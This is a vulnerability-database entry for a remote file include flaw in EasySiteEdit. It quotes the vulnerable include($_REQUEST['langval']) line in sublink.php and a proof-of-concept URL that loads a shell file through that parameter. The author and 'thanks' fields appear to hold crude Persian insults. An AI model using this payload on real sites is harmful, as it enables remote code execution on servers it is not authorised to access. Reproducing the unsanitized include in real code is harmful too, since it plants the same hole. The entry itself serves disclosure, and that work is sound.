header-logo
Suggest Exploit
vendor:
EasySiteEdit
by:
koskesh jakesh
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: EasySiteEdit
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2011

EasySiteEdit remote file include

EasySiteEdit is vulnerable to a remote file include vulnerability. This vulnerability exists in the 'sublink.php' file, where the 'langval' parameter is not properly sanitized before being used in an 'include' function. An attacker can exploit this vulnerability by sending a malicious file to the 'langval' parameter, which will be included and executed.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

# Exploit Title: EasySiteEdit remote file include
# Date:2011 
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip 
# Tested on: linux
-------------------------------
vul:sublink.php
line 20: 
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat

Navigation

Suggest Exploit

Services By CQR